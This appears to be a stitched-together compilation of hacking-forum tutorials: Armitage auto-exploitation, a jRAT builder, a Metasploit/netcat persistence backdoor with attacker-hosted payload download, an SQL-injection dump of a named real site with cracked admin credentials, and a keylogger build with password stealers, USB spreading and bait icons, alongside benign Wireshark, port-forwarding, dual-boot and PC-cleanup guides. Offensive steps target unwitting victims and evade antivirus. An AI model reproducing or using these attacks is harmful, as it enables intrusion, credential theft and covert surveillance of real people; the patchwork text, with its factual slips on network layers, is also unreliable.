"Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework."
Armitage is basically an easy way to use Metasploit with a fancy GUI that makes your work much easier
In this tutorial you will learn how to use Armitage in order to try to gain access to machines in your network
Requirements:
● Backtrack 5 - Download it here
● Armitage - Download it here
Important Information:
▸ This guide is VERY detailed, so anyone can follow it
▸ The tutorial was done using Backtrack 5 R2
▸ This will cover the basic "Hail Mary" attack
▸ Hail Mary: to run on each machine all it's possible exploits
Step 1 :
Open Armitage:
Step 2 : Click "Connect" (image 1) and then "Yes" (image 2)
Select "Quick Scan (OS Detect)"
Note: You can perform any scan you want.
I recommend this one because it's fast and effective
I'm working with only a few machines here. With 20+ machines, Intensive or Comprehensive Scans will be a lot slower
But remember: the more information you have on a machine, the better will Armitage decide what exploits you can and cannot use on it
Enter the IP address range
172.16.2.1-6 means: from 172.16.2.1 to 172.16.2.6
IMPORTANT: I'm only adding that machine because I know it's vulnerable. Ignore it for now
Select all the machines (Drag or Ctrl + Left-click)
Right-click any machine and select "Scan"
Wait until you see this on the console part of the screen
Note: This is only to be sure you have the information you need about the machines
Or in some cases, to get a little more information about the machines
I recommend you always do it
Select "Find Attacks" from the "Attacks" menu (image 1) and then "OK" once it has finished
Select "Hail Mary" from the "Attacks" menu
Note: You can Right-click each machine and manually run any exploits you want from the "Attack" menu
The Hail Mary is described in the Important Information section in the beginning
Wait while the attack is finished
IMPORTANT: As you can see, the machine in red has been infected
I now have full access to it. (It's the one I added later, just to show you how it looks like)
Right-click any infected machines and select what you want from the "Shell #" menu
VERY IMPORTANT: The machine in my example is running UNIX. In the end of the tutorial you can see what it would look like if it was a Windows machine
After selecting "Interact" I issued the "ls" command on the console just to show you the basic of what you can do
Here is what it would look like if the infected machine was running Windows
Instead of the "Shell #" you have "Meterpreter #"
You have many more options, including "Screenshot" and "Capture all keyboard input"
Nessus is a network vulnerability scanning program. It is free for personal use. Its can detect vulnerabilities on the systems. Nessus is the most popular vulnerability scanner in the computer security. Nessus allows scans for vulnerabilities, misconfiguration, default passwords / common passwords / blank passwords on some system accounts, etc. You can use Nessus to scan your system and patch the vulnerability. If you want install Nessus on Backtrack 5 R3 first thing to do is download it from http://www.tenable.com/products/nessus/
Download the Nessus package from here and install it manually. If you have internet connection you can install Nessus from repository. Run this command to download and install Nessus.
apt-get install nessus
After install it, create an account with adduser command like this
/opt/nessus/sbin/nessus-adduser
Now register to Nessus website http://www.nessus.org/register/ to get your activation code that send to your email. After you get the key, run this command, fill change xxxx-xxxx-xxxx-xxxx-xxxx with your key
/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx
It will take some time because plugin is being updated. After the update complete, run your Nessus
/etc/init.d/nessusd start
Then open your browser and type this in the URL of the browser
https://localhost:8834/
Nessus will run on the secure channel https and on the port number 8834. Now try and use Nessus for your own risk
We have learnt a lot on how to DOX, but in this guide i will be featuring more on the countermeasures of how to protect yourself from being Doxed.. Keep reading.
PT. 1 Staying Anonymous Over The Internet
Some of you may ask, why stay anonymous over the Internet? Well my honest answer would be to save your ass. People these days are DoXing to the deepest and releasing all of your information. With partial information of your address, number, and real life name, they can expose and make your life a living hell. Spamming your phone, prank calling. Swatting, exposing you to the Operationals. All in various ways. Let's begin.
PT 2. VPN and Proxies
VPNs and Proxies are used to keep your IP hidden and Data Encrypted. For these, you'll need them for anything you do in specific. IF you perform illegal activities I recommend Offshore hosting that keeps no logs for a VPN. This will 90% of the time save you. These days, someone can get your IP Address with ease, and you won't even know. With this they can Geo Locate an IP Search lookup. Finding out where you live, your ISP, etc. You want to always keep this hidden to avoid getting DoXed or exposed. If you browse around HF, they sell plenty of offshore hosting VPN's that are dedicated. With no logs given.
PT 3. Emails
Emails are for personal use, quick use, anything in those lines are known. As a hacker, you need to make a fake information email, that you'll use only for the lines of hacking. Never give out your real email in the fact of that it can be looked up and DoXed for your number, Address, Name, DOB, etc. For quick use of mail, you can use 10minutemail.com and it will a specific IP designed for your cache and it will remember at all times. No signup required and you have 10 minutes of temporary use, if you need more, you can click add more time.
PT 4. Your hacker name or nick name.
As a hacker, you never want to be stated by your real name, because this will also get you exposed. You always wanna be recongnized by another nickname of Hacker name given. This will actually be a big help although it may seem skiddish. Who gives a shit, it saves your ass. I have a friend that I've known for 6 months and I don't know his name, age or where he lives. He's one of the poeple that you'll never find. He's never been caught.
Hope this helped for all of you new adjusted hackers out there. This will help out alot. All hackers start out as n00bs, it's normal. It doesn't come natural to anyone, as scientist says, we are born dumb. This is where the world breaks it. Reality is the core of life.
4) Once you have clicked it, name your host anything you want (I suggest something such as "myjrathost" or anything easy to remember). I suggest using no-ip.biz for the last part.
5) Download DUC Client Here
6) Run the DUC Client and log in. Click on "edit hosts"
7) Mark the check box of the host you created and click on "Save"
8) Go to Main> Server Module> Advanced Builder
9) Click on the two green arrows a few times to generate an encryption key. COPY IT DOWN SOMEWHERE!
10) Click on network and put in the no-ip host that you created earlier. Also put in the port that you want to use. (I recommend 1336, because that is the default jRAT port)
11) Go to startup and check "start server with os boot" and "hide installed file"
12) You can add an error message if you want to make your RAT look more legit.
13) Go to binder. You can add a program to be ran along with your RAT if you would like. In this case, I'm using Google Chrome.
14) Go to "Mutex". Enable mutex and click on the two green arrows a few times.
15) Skip "Allowed OS" unless you want to add potentially unstable operating systems onto the stub such as Linux.
16) Skip "Timeout", "Delay", "Host File"
17) Skip "Plugins" .
18) Go to "Error Logging". You can enable it if you want. It can help you solve issues if you are experiencing problems.
19) Skip "Tray Icon", "Persistence", "USB", "Debug Messages", "Classes", and "Output"
20) Go to final and save it anywhere.
You now have everything set up except for Port forwarding! I will now teach you how to do so in this POST
Today i will show you how to create a backdoor, that you can use whenever you want through UPnP. TO under stand it better with the help of google i made this picture :
A Brain ( MOST IMPORTANT )
Patience ( IMPORTANT )
A router with UPnP enabled
An understanding of Metasploit .
An understanding of TCP/IP
An Understanding of UPnP
Step 1 : Get a Meterpreter ::
To get a meterpreter, there's a few way of this.. You can social Engineer and send a payload to the least detectable as possible.. You can exploit a vulnerability, but generally the box is up-to-date.. Use your Imagination to get the meterpreter.. :P
for an eg: i used:
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp
LPORT=4444
LHOST=192.168.1.97
Autorunscript='migrate -n explorer.exe'
Then launch a listener, and migrates to "explorer.exe" for more stability .. :P
Step 2 : SEND YOUR BACKDOOR
before the attack, you have carefully prepared the software that you will be sending to the Victim.. Take a look inside the /pentest/windows-binaris/tools . Create a Directory to paste the stuff of your want :P I paste mine in the /root/binup folder ..
Upload them to the system32 and to start it, just type the name ..
UPnP download --> DOWNLOAD
Step 3 : SET YOUR FIRST UNDETECTABLE BACKDOOR
To start with the Setup of the backdoor you will have to type
meterpreter>reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe'
THEN TYPE
meterpreter>shell
CHECK THE OPEN PORT ON WINDOWS FIREWALL
C:\Windows\system32>netsh firewall show portopening
ADD A RULE THAT CALLED "ServiceFirewall" FOR THE 455 PORT WITH THIS COMMAND
C:\Windows\system32>netsh firewall add portopening TCP 455 "ServiceFirewall" ENABLE ALL
ADD YOUR STUFF ON FIREWALL EXCEPTION
C:\Windows\system32>netsh firewall add allowedprogram c:\windows\system32\exec.exe "exec" ENABLE
C:\Windows\system32>netsh firewall add allowedprogram c:\windows\system32\nc.exe "nc" ENABLE
C:\Windows\system32>netsh firewall add allowedprogram c:\windows\system32\wget.exe "wget" ENABLE
C:\Windows\system32>netsh firewall add allowedprogram c:\windows\system32\upnpc-static.exe "upnp" ENABLE
LAUNCH THIS COMMAND FOR ADD A STATIC UPnP RULE
C:\Windows\system32>upnpc-static -a 172.30.1.10 455 455 TCP 0
upnpc : miniupnpc library test client. (c) 2006-2011 Thomas Bernard
Go to http://miniupnp.free.fr/ or http://miniupnp.tuxfamily.org/
for more information.
List of UPNP devices found on the network :
desc: http://172.30.1.1:2189/rootDesc.xml
st: urn:schemas-upnp-org:device:InternetGatewayDevice:1
Found valid IGD : http://172.30.1.1:2189/ctl/IPConn
Local LAN ip address : 172.30.1.10
ExternalIPAddress = 192.168.1.14
InternalIP:Port = 172.30.1.10:455
external 192.168.1.14:455 TCP is redirected to internal 172.30.1.10:455 (duration=0)
Now, if you followed everything correctly, you have setup the first Backdoor, lets move to the second ! :D
STEP 4 : ADDING A SECOND BACKDOOR
NOW YOU HAVE A SILENT ACCESS TO YOUR SLAVE YOU CAN SETUP YOUR 2ND BACKDOOR. HOST A PAYLOAD ON A LOCAL OR A REMOTE SITE. I CHOOSE THE LOCAL.
TYPE IN CONSOLE:
root@bt~:# nc 192.168.1.14 455
pfSense.lan [192.168.1.14] 455 (?) open
Microsoft Windows [version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Tous droits r�serv�s.
C:\Windows\system32>
CREATE A PAYLOAD UNDETECT AND PASTE IT IN /var/www AND TYPE :
C:\Windows\system32>wget http://192.168.1.97/Msf.exe
--19:25:27-- http://192.168.1.97/Msf.exe
=> `Msf.exe'
Connecting to 192.168.1.97:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73,802 [application/x-msdos-program]
0K .......... .......... .......... .......... .......... 69% 48.83 MB/s
50K .......... .......... .. 100% 21.55 MB/s
19:25:27 (70.38 MB/s) - `Msf.exe' saved [73802/73802]
OPEN A SECOND CONSOLE AND LAUNCH A LISTENER WITH :
root@bt~:#msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.97 Autorunscript='migrate -n explorer.exe' E
AND HIT A METERPRETER
C:\Windows\system32>Msf.exe
NOW YOU HAVE FULL CONTROL OF THE SLAVE YOU CAN INSTALL A PERSISTENT METERPRETER WE USE A TEMPLATE FOR AVOID ANTIVIRUS WITH THE -T OPTION
meterpreter>run persistence -S -T /var/www/exec.exe -U -X -i 5 -p 4444(FORWARDED PORT) -r WAN ADDRESS OF YOUR INTERNET PROVIDER
NOW EACH TIME A USER LOGS THIS WILL OPEN A METERPRETER
Conclusion
UPnP is very dangerous Even today, the UPnP IGD is enabled by default on many router. I have read other articles dealing with the flaws in UPnP integrate flash or flaws XSS. The best way to guard against this kind of attack is simply to disable it.
This image (known as the OSI Model) shows us the layers on how a network communicates. As shown, it divides the means of connection into 7 distinct layers. The further explaining of the layers are explained below.
Layer 7: This is the transport layer in which mainly consists of HTTP connection to a website. This is what your web browser (application) shows as the result of successfully receiving the packets. This is what you will be seeing on your monitor when the packets have been successfully received and built (also referred to as the 'end product'). This isn't necessarily the part that is interesting about packet sniffing. Layer 4 and below is where packet sniffing becomes extremely fun.
Layer 6: This is the layer that typically involves an SSL (Secure Sockets Layer ) protocol. It is used by many websites to send data securely.
Layer 5: All this layer describes is the creation of the session layer.
Layer 4: Now, here is where packet sniffing starts to shine. Layer 4 has to do with the transporting of packets. You know, what protocol am I using? Is it TCP or UDP? If I were on YouTube, for example, it would appear as 'UDP'. But, if I were to go to Google, it would be 'TCP'.
Layer 3: This is the layer where the actual packets reside. This is where you would be getting into how the packets get put together, and the source and destination address. This layer will show you the little bits of data (packets) that will be going through your wire (or, if you're on WiFi, through the atmosphere) and reassemble on the other end, hopefully giving you the desired results (correct webpage). If, however, these packets get sent out of order, you would get a corrupted page. This isn't that common among webpages, but with downloads, this is how you get a corrupted file.
Layer 2 & 1: This is the actual physical layer of your network and the components that it needs to communicate properly. This is all about the copper in the ground and your ED (also Ethernet cables and such. You get the idea.). Layer 1 focuses on the actual waves and particles behind communication (for example: satellite).
The layers listed above will give you a better perception when you're packet sniffing. Getting to know the above layers will help you dissect the actual information you will log with Wireshark. Now that we've got that out of the way, lets move on to actually using Wireshark, and putting it into perspective. The first thing you want to do once you have downloaded Wireshark is, simply, set it up. Go through the Install Wizard's prompts and choose to 'run' Wireshark. You can also use the desktop icon if you chose to add one to your desktop. Now assuming that you executed the program, a window should open up and it will look like the one below :
From here, you now have access to a handy GUI interface to which you can now start capturing data with. You're going to want to click on
your NIC below the 'Start' button and click 'Start'. From here, you should have a window similar to this:
As you can see, on the top section of Wireshark there will be your packets that you are currently logging (this depends on the webpages you currently have open in your web browser. If you wanted, you could open up a new tab and go on over to Hackforums.net and switch back to Wireshark to see the packets rolling in).
As you can see from the new pane in Wireshark, the first column on the section (from left to right) reads 'No.' (which stands for 'number'). This will tell you want number packet it is since you started capturing (or sniffing). On the next column to the right, it reads 'Time', which basically means how long it took since you started capturing for the packet to be received. The third column shows the source IP address (the packet's origin), and the fourth column shows the destination IP address. And, the fifth column shows the protocol, whether it be Domain Name Server or Transmission Control Protocol, or HyperText Transfer Protocl (to be very brief about HTTP, you do not want to login in to websites while you're on HTTP. The protocol transfers your passwords non-hashed and in plain text. This means that it is easy for someone who is sniffing your network to get your login). And, finally, the 'Length' and 'Info' column show the more advanced information of the packet.
Now, depending on what you want to do, you can choose to filter the types of packets via the 'Filter' bar at the top of the window. Lets say that you wanted to view only HTTP requests. You would then go to the Filter bar and type "http.request". This command would just show the packets of interest. Alright, remember when I said when you were streaming that you could go and visit a website of your choice (I recommended Hack Forums) and see the packets be logged? Well, browse through the log and look to the right column for something with 'hackforums' in the URL. Once you find it, right click on it and hit "Follow TCP Stream". Wireshark should come up with a new window with red text showing what data you sent, and in blue what data you received. Again, this shows all of the raw data within the packet, which I would get into if this weren't a fundamental guide to Wireshark.
All credits go to Legion of HF :)
Here is a compilation of multiple forensic and penetration testing tools for applications, networks, and websites.
[ NOTE: For tutorials on the Tools mentioned below, click on the Tools Image. You will be redirected to the pages where you can find tutorials based on the Tools. Good Luck ]
Nmap is a very versatile tool developed to scan addresses (IPV6 included), this tool allows the users to gather a mass amount of information about the target quickly, information including open ports, + much, much more. Nmap supports a large number of scanning techniques such as: UDP, TCP connect(), TCP SYN (half open), ftp proxy (bounce attack), ICMP (ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, IP Protocol, and Null scan.
A very powerful network troubleshooting and analysis tool, WireShark provides the ability to view data from a live network, and supports hundreds of protocols and media formats.
-------------------------------------------------------------------------------------------
Cain and Abel is a revolutionary tool that provides many functions that are able to do various password retrieval jobs, cracking passwords, sniffing networks, and routing/analyzing protocols. This tool is Windows-only, unlike many other tools that exist, this is a pleasant twist to modern penetration testing and forensic tools.
MetaSploit, a very powerful network security and analysis tool, used often for penetration attacks, this tool has a clean interface and easily gathers the information that you seek.
Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. (Taken from their website)
Havij is the most common and heard of testing tool for SQLI injection and many other web-based injection types. It fluently provides the site's scan, admin look-up, password cracking, and database retrieval. It literally makes it a breeze to hack, and find, vulnerable websites
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. (Taken from http://portswigger.net/burp/)
Acunetix is a strong, and very popular website security tool. It provides many tools to test your website, (or others) for various injections. Acunetix WVS automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.
Back Track is a widely popular bootable Live-CD of a Linux Distro. Back Track offers a vast variety of penetration testing tools, along with those for network attacks, and supports many other forms of testing/attacking, for VOIP networks, Websites + more. The tool's interface and design provides an easy to use layout.
What is Port Forwarding and what are it's uses and benefits ??
Why Do I need to setup a Port Forwarding ??
1. Access to your router :
You will need to have access to your router to configure the port you want to forward to your IP address. You can access the configuration page of your router by typing the router's IP address in the address bar of your browser. If you do not know this address, you can find it by opening a command prompt window (start -> all programs -> accessories -> command prompt), typing "ipconfig" (without quotes) and pressing enter. The default gateway address is the address of your router.
When you go to this address in your browser, you will probably be asked for a username and a password. When you do not know this, you can try the routers default password. Simply look in the routers manual or download your routers manual from the manufacturers website. Alternatively, you can google your default login or go to http://www.routerpasswords.com/.
2. A Static IP:
In order to keep your IP address the same as the one in the port forwarding table, you need a static IP address. Most home networks use DHCP, this is a protocol to automatically assign an IP address from a certain address range to a NIC (network card) when the computer boots up. It is possible that when you reboot your pc your router will assign a different IP address to your NIC then you had before, but the port will still be forwarded to your old IP address. Obviously you need to keep the same IP address all the time. First, you have to pick the IP address you are going to assign to your NIC. This has to be an address which is not in use, so you cannot pick an address which is in the DHCP address pool (the addresses automatically assigned to other machines in the network). You can find this address range somewhere in the configuration page of your router. I've made a screenshot of my router's DHCP configuration:
As you can see, my starting ip address of the DHCP pool is 192.168.1.31 and there are 50 addresses in the pool. This means I cannot use all the addresses between 192.168.1.31 and 192.168.1.81. Note that this may look different on your router. Other addresses I cannot use are other used static IP addresses on the network like 192.168.1.1 which is used by my router. As you can also see, I have a subnet mask of 255.255.255.0. You will most likely have the same. The subnet mask determines the number of IP addresses in your network. A subnet mask of 255.255.255.0 means all the addresses between 192.168.1.1 and 192.168.1.255 are valid network addresses on your network. Beware: one other address which is already in use is 192.168.1.255. This is not used by a machine, this is the broadcast address. With this address you contact all the other addresses on the network. This is for example used for messages which contain information about a network change. You'll never need to use this address yourself, this is all done by services. In my example, 192.168.1.10 is a free address which I'm going to use for my PC. Note that it is possible to have a different IP range on your network, for example 192.168.0.X or 10.0.0.X. Just take the same steps as I've done but with your IP range.
Setting up Port Forwarding :
In order to set up port forwarding there are 2 things we need to do. First we need to assign the static IP address you just chose to your network adapter. In my case this is 192.168.1.10. You also need your subnet mask and your default gateway. You can also find this through the ipconfig command. In order to configure your network adapter you need to go to control panel ->network and sharing center. In the left pane click "Change adapter settings". You will get this screen:
Right click the adapter you are using and click properties. You will get this:
Right click "Internet Protocol Version 4 (TCP/IPv4)" and click properties. Now fill in the adresses you have found. For DNS server use the same address as your default gateway. When you're done click OK.
Now we have configured a static IP address we need to forward our port to this address. You need to go to the router configuration page to do this. This is different for every router, so if you cannot find this yourself you could google "port forwarding <insert routertype here>".
In my router, a Draytek Vigor 2130, it's under "NAT -> Open Port".
I've configured it using my port and local IP ... Use TCP+UDP; different rats use different protocols for different types of transfers, use them both to be sure.
Once you have opened this port to your local IP you're ready to test your port. You can use a website like canyouseeme.org. Note that you will need to listen on the port with an application (like your RAT) to get a response. If you're not listening on your port you will probably get a false negative.
So you have Windows 7 installed and you want to dual boot Linux, well I will be showing you how. The distribution I will be dual booting with is Ubuntu since it is the most commonly used.
Now lets begin, you first need to boot up the Ubuntu Live CD. One of the first screens you should get is this one -
Go ahead and click install Ubuntu. After doing so the next thing you will get is the preparing screen as seen below. Go ahead and just click continue.
Now you should get a installation type screen. Here is the most important step to dual booting. If you already have windows installed it should detect it and give you a screen like the one below.
You should choose the install ubuntu alongside windows,then click continue.Now you will have a screen to allow you to choose the size of the partitions. As seen below.
From here you choose the size you want each to be and then click continue. The installation will then begin and do the rest for you. All you have to do is wait until it is finished. After rebooting you will be asked to enter the usual information like username and password and it will finish installing. So there is how you dual boot Windows 7 and Ubuntu I hope this guide helps anyone out there wanting to dual boot Windows 7 and Ubuntu.
how to hack websites using Auto SQL I Helper V.2.7
First you need to find the potential website that you think it might be possible to hack it. Remember that some websites are simply un-hackable.
So start by downloading the EXPLOIT SCANNER to find the vulnerable websites. And at the end once you find the admin username and the password use Admin finder to help you finding the admin login page but remember that you can't find all login pages.
After you find your website ( better to end with "article.php?id=[number]" )
For this tutorial, i am going to use a Legitimate site. [Note: Please note that i haven't hacked the site. i have just used it for the purpose of the tutorial]
After a while of Googling, i found this site http://encycl.anthropology.ru (which i am going to use in this Tutorial)
After you click on the link above you should have somewhat an error like
Query failed You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname
This mean that this website can be hacked because you get an error.
Now open your SQL I Helper V.2.7
and write the link :
http://encycl.anthropology.ru/article.php?id=1 <---- without the '
here and it should look like the one in the image below:
and press the Inject button.
Now you should wait until the tool finish searching for columns . Time may vary depending on your connection speed , your pc speed , and the number of columns in the website. So now you should have this:
Make sure that the website support union otherwise the injection won't work.
Then select "Get database" and you get this:
Now select any element from the "database name" box and press the "Get tables" button , I will select "anthropo_encycl":
Then select any element from the "table name" box and press the "Get columns" button , I will select "user":
Then select any elements you want from the "columns name" box and press "Dump Now" , i will select "usr_login" and "usr_pass"
After clicking "Dump Now" , you should see this new window
Now copy the hash on a peace of paper and go to this website:
http://www.md5crack.com/
enter the hash and press the button "Crack that hash baby!" and you should get the source of the hash.
hash:21232f297a57a5a743894a0e4a801fc3
username: admin
hash:202cb962ac59075b964b07152d234b70
pass: 123
[[ NOTE: AS USUAL DONT FORGET, THIS INFORMATION IS ONLY FOR E PURPOSES. ANY MISUSE OF THE INFORMATION FROM THIS BLOG OR THE TUTORIALS PROVIDED HERE, THE ADMINS AND MEMBERS OF TEAM IHA SHALL AND WILL NOT BE HELD RESPONSIBLE. YOU ARE RESPONSIBLE FOR THE MISUSE OF THE INFORMATION PROVIDED HERE ]]
Next, on the left side of the putty window there is a navigation tree. In that tree you want to select the Tunnels item. If this item isn't already visible, you can find it by clicking the Connection node in the tree, then SSH, and then Tunnels.
Under the section labeled "Add a new forwarded port" type in a port like 6565 for the source port. Leave the Destination field blank, then select the Dynamic and Auto radio buttons. Then click the Add button, and you should see the text D6565 show up in the textarea just above the "Add a new forwarded port".
Congratulations -- that's all you had to do to configure Putty. Now all you have to do is login to your remote server. To do this, just click the Open button at the bottom of this window. You should see a Putty login shell open up to your remote server. Just login to your remote server with your username and password, and you're done.
That's all you need to do to open the tunnel. Now you're ready to configure Firefox.
Configuring Firefox to use this new SSH tunnel is simple. Start Firefox, then select the Tools menu, and then select the Options... menu item. Now click the Advanced icon (on the upper-right of the dialog), and then select the Network tab.
Now click the "Settings..." button. This brings up the Connection Settings dialog. On this dialog click the "Manual proxy configuration" radio button, then put the address 127.0.0.1 in the SOCKS Host field. In the Port field just to the right of the SOCKS Host field enter the port you used when configuring your SSH tunnel with Putty. In my case this port was 6565. The completed dialog is shown in the following figure:
Tick the following boxes:
- Encrypt email
- Stealers
- Delete cookies
- Block AV sites
- USB spread
- Startup
- Kill Taskman (optional, leave blank if you want this to be more stealthy)
- Force steam
- Clipboard logger
- Screen logger
Those options will do the following:
Stealers = Sends you saved passwords for internet browsers
Block AV site = Stops the victim from checking an antivirus site if they get suspicious
USB spread = Infects any USB devices plugged into the machine, so if they are put into other computers they will infect them
Startup = Runs the keylogger every time the machine is switched back on
Kill Taskman = Stops the victim opening task manager
Clipboard logger = Saves anything copy/pasted
Screen logger - Sends you a screen shot of the victims PC
Next we have to tick the box called 'Enable Error'. This will give the victim an error message when they open the file, make sure you put in something creative, but relevant the fake program.
Now we need to fill in the mailing options. I recommend using mail as opposed to FTP because it is more secure and its a lot easier. Put in your email address and password. If you are using a Gmail you don't have to change the 'SMTP' options, if you aren't google the SMTP options for your email provider. Click 'test email', if a box pops up saying success, you've done everything right, if not, go back and do it again. There should be a box below that which says 'Interval'. Set that to whatever time you want.
Now click 'Change file properties'. This will open up another GUI. Find an icon that suits your fake program here
The icon changer might not work for everyone. If it doesn't, download a free icon changer from google.
Close the properties window.
Click 'Build Server'. This will build the keylogging file. Make sure you have your antiviruses disabled as they will delete the file. You can reactivate them when you are done.
Congrats, you've built the keylogger!
Now all you need to do is send it to your victim and get them to open it!
If you accidentally open your keylogger, just open up SysLogger and click 'Cure'. Type in the name of the file and you will be cured.
I hope you guys find this useful! If you do, please SHARE | TWEET
Is your computer running running slow or do you think you are infected? If yes than this thread is for you!
First you must learn to differentiate between an infection and just general computer slowness.
Symptoms of Infection
There are a number of symptoms which indicate that your computer has been infected. If you notice "strange things" happening to your computer, namely:
unexpected messages or images are suddenly displayed
unusual sounds or music played at random
your CD-ROM drive mysteriously opens and closes
programs suddenly start on your computer
you receive notification from your firewall that some applications have attempted to connect to the Internet, although you did not initiate this, then it is very likely that your computer has been infected by a virus.
your friends mention that they have received messages from your address which you know you did not send
your mailbox contains a lot of messages without a sender's e-mail address or message header.
These problems, however, may not be caused by viruses. For example, infected messages that are supposedly coming from your address can actually be sent from a different computer.
There is a range of secondary symptoms which indicate that your computer may be infected:
your computer freezes frequently or encounters errors
your computer slows down when programs are started
the operating system is unable to load
files and folders have been deleted or their content has changed
your hard drive is accessed too often (the light on your main unit flashes rapidly)
Microsoft Internet Explorer freezes or functions erratically e.g. you cannot close the application window
Reference: http://www.viruslist.com/en/viruses/ency...=153280800
NOTE: Paranoia is not a symptom of infection!
What to do if your Computer is Running Slow
Content taken and edited from malwareremoval.com
Computers need regular maintenance, I know this comes as a shock to some of you, but it's true nonetheless.
It's best if we break things down into two sections, the first are those that should be done regularly, the next are those that only need to be done once, or very infrequently.
1. Tasks that need to be carried out regularly.
Clean out Temp files
During the normal operation of your computer, Windows and your other programmes create an awful lot of temporary files. For the most part they are just that, temporary. But for any number of reasons, when they're no longer needed they don't get removed by the programme that created them. So over time their number builds up, and unless you clear them out they can slow down your computer noticeably.
In the case of your Browser, the problem can be worse. All browsers cache the web pages you visit. The original reason was to make loading pages faster. When everyone was on dial-up this was quite a good idea, but with modern fast connections it's mostly unecessary now. However browsers still cache webpages, and unless cleaned out regularly they build up to a position where they can have some pretty dramatic effects on how your browser works. Any number of wierd browser problems are caused by nothing more than an overfull cache.
So once a month, or once a week if you're a heavy user, it's a good idea to clean out your Temporary files.
To clean out temp files:
A good program to run regularly is CCleaner.
Download CCleaner from here
Double click on ccsetupXXX_slim.exe to start the installation of CCleaner. (XXX is the version number)
Click OK
Click Next
Click I agree
Click Next
Click Install
Once the installation has finished, click Finish
Open CCleaner if it's not already running.
Select Cleaner Settings.
Check Internet Explorer, Windows Explorer, and System so that all items are checked. Then under Internet Explorer, Uncheck "History". In the Advanced section, have a check only on Old PreFetch Data.
Click on the Options block on the left. Select Advanced.
Check Only delete files in Windows Temp folders older than 48 hours.
Set CCleaner to Run When Computer Starts. Click on the Options block on the left, then choose Settings. Check Run CCleaner when computer starts.
Defrag your Hard Drive
Every time you write a file to your Hard Drive, the drive controller has to find space on your drive. It will often break files into fragments, so that it can use the available disk space efficiently. However over time files can become very fragmented because of this, and your drive controller has to work harder to find all the fragments and re-combine them so that a programme can use it. This slows things down, depending on the amount of fragmentation of your files, it can slow things down a lot.
So once a month (for heavy users), or once every 3 or 4 months (for light users), it's a good idea to defragment your hard drive.
This will re-arrange the fragments on your drive so they form contiguous entities which are much easier for your drive controller to deal with.
It's a time consuming operation, usually taking several hours, so best to do what I do, and start it going before you go to bed.
To defrag your hard drive:
Click Start
Run
Type: Dfrg.msc and click ok.
Select your main Drive or "Volume" (usually C)
Click Defragment
This may take a while so as said previously, best to leave running over night. Once it has completed, repeat the procedure on any other drives you have on-board.
2. Tasks that don't need to be carried out so often.
Reduce the number of Start Up programs.
Pretty much every programme you install these days is set to auto start when you boot up. The programme manufacturers tell you it's for your benefit, but the truth is for most of them it's just not necessary that they do so. Lots of auto starting programmes will severely slow down your startup time, and having lots of unecessary programmes running in memory will slow down the running speed of your computer as well.
Luckily it's not hard to prevent unecessary programmes from auto starting. Doing so does not mean you can't use the programmes, you start them by double clicking on their icons, just as you always have, it just means they won't be running when you're not using them.
Of course programmes like your Firewall and Anti-Virus need to auto run, so we won't be touching them at all.
To remove programs from startup:
Download StartupLite by Rubberducky to your Desktop.
Doubleclick StartupLite.exe to launch the programme.
Ensure the Disable box is checked.
Click Continue.
A pop up message will tell you the unecessary startup items in your list have been disabled and ask you to restart your computer.
Re-start your computer.
Check the amount of free space you have on your Hard Drive.
Windows (XP and Vista) needs a certain amount of "overhead" (free disk space) if it's to operate efficiently. If it doesn't have that space, your processor has to "page out", which will slow everything down considerably.
Ideally you need at least 15-20% of your disk to be empty, if you don't have 15% then it's time to start freeing up some disk space.
To check your free disk space:
For users of XP
Click Start > All Programs > Accessories > System Tools > Disk Defragmenter
Look in the last column (top right) under % Free Space
Exit Disk Defragmenter
For users of Vista
Click Start > Computer
A window will open
Information for your Hard disk drive(s), including the exact amount of free space available, will be displayed in the uppermost portion of the window.
Presuming you don't have enough free disk space, here's a couple of suggestions for freeing some up
Remove unecessary programmes.
OK, time to be honest with youself, are you really using all those programmes you've got installed, or are there some that you haven't used in a lifetime. If there are, then why not get rid of them and free up some disk space. Your hard drive will thank you for your efforts.
To remove unwanted/unused programs:
For users of XP
Click Start > Control Panel > Add or Remove Programs
Click on the programme you want to remove to highlight it.
Click the Change/Remove button and follow any instructions given.
Repeat for all programmes you wish to remove.
For users of Vista
For Control Panel Home view - Click Start > Control Panel > Programs > Programs and Features
For Classic View - Click Start > Control Panel > Programs and Features
For either option, to uninstall a program, select it from the list and then click Uninstall.
Reduce your System Restore Points.
Windows creates System Restore points on a regular basis (every 24 hours), they take up a great deal of space on your hard drive (upto 12% for XP, 15% for Vista). If your computer has been running without problems (other than the slowness) for some time, then you can free up a lot of space by reducing the number of System Restore points to one (the latest).
Windows will continue creating more RPs, but it'll take some time before you need to thin them out again.
To reduce the number of System Restore points:
For users of XP
Click Start > All Programs > Accessories > System Tools > Disk Cleanup
This will bring up the Disk Cleanup window.
Click the More Options tab.
In the System Restore field, click Clean up
You will be prompted if you want to remove all but the most recent Restore Point.
Click Yes.
Click OK.
When prompted whether you're sure you want to do this click Yes.
For users of Vista
Click Start > All Programs > System Tools > Disk Cleanup
Select Files from all users on this computer
Click on Continue
Select the appropriate drive letter (usually C:)
When the Disk Cleanup window opens, select the More Options tab
Under System Restore and Shadow Copies click on the Clean up button
All but the latest restore point will be removed
Note: In some editions of Windows Vista, the disc might include file shadow copies and older Windows Complete PC Backup images as part of restore points. This information will also be deleted.
------------------------------------------------------------------
Description of the script:
